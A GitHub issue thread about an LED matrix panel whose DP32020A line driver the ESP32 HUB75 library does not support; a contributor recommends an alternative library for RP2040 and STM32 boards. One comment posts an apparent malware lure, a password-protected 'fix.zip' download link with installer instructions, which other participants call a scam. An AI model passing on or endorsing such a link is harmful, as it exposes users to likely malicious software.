### ISSUE TITLE
Issue with panel 64x32 chip DP32020A

### ISSUE THREAD

**Issue by impuls-op** [mrcodetastic/ESP32-HUB75-MatrixPanel-DMA#671]
I have problem with my panel 64x32 chip **DP5135+DP32020A**

This photo "Simple Test Shapes" with setting **DP3246**
mxconfig.driver = HUB75_I2S_CFG::DP3246_SM5368;

I think I need to replace or add the config on file "ESP32-HUB75-MatrixPanel-I2S-DMA.cpp" but I don't know what settings needs. Please help

![IMG_1978](https://github.com/user-attachments/assets/f8671ae9-8654-4c4a-895d-b201da1ee9d8)
![IMG_1980](https://github.com/user-attachments/assets/fcaa88cd-031b-429b-848d-56b8026a4042)
![IMG_1981](https://github.com/user-attachments/assets/09e18587-3fe3-4160-9f0c-d386803449f0)

https://github.com/user-attachments/assets/450d8bd9-6d67-4a6f-a99c-31a0489e891a

**Comment by board707** [comment]
Hi
Your panel contains a DP32020 chip - it is a shift register line driver. The current library doesn't support this type of drivers. If you have an experience with C++ coding and some courage to edit the source, I could help you to modify the library to work with 32020 chip. 
However, if you have the opportunity to return the panel to the seller and choose another one with supported drivers - it would be easier.

Also you could work with this panel, using RP2040 or STM32 Arduino compatible boards.

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by board707** [comment]
> Download

What this?
I don't have a habit of downloading archives from unknown sources.

**Comment by impuls-op** [comment]
> Hi Your panel contains a DP32020 chip - it is a shift register line driver. The current library doesn't support this type of drivers. If you have an experience with C++ coding and some courage to edit the source, I could help you to modify the library to work with 32020 chip. However, if you have the opportunity to return the panel to the seller and choose another one with supported drivers - it would be easier.
> 
> Also you could work with this panel, using RP2040 or STM32 Arduino compatible boards.

I can't C++ coding. Tell me please what a library on RP2040 support DP32020 chip?

**Comment by board707** [comment]
> what a library on RP2040 support DP32020 chip?

[DMD_STM32](https://github.com/board707/DMD_STM32)

**Comment by mrcodetastic** [comment]
Pretty impressive that they're scamming with context relevant posts.
